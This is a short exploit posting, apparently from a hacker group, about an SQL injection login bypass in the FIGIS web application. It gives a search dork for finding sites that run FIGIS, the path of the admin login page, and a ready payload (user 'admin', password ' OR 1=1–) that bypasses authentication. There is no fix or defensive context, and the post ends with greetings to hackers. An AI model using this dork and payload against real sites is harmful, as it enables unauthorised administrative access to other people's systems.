FIGIS (FILogin.do) Bypass SQL Injection Vulnerability

Download:

Not Available

Bug found by Jose Luis Gуngora Fernбndez / JosS

Contact: sys-project[at]hotmail.com

Spanish Hackers Team

www.spanish-hackers.com

/server irc.freenode.net /join #fullsecure

d0rk: "accionado por FIGIS" / "powered by FIGIS"

Stop lammer

Admin Login:

…/PATH/FILoginAction.do
http://example.com/fi/FILoginAction.do

Simple - SQL Injection in Admin Login (Exploit)

User: admin
Password: ' OR 1=1–

//---------------------------------------\\

Greetz To: All Hackers
Jose Luis Gуngora Fernбndez / JosS!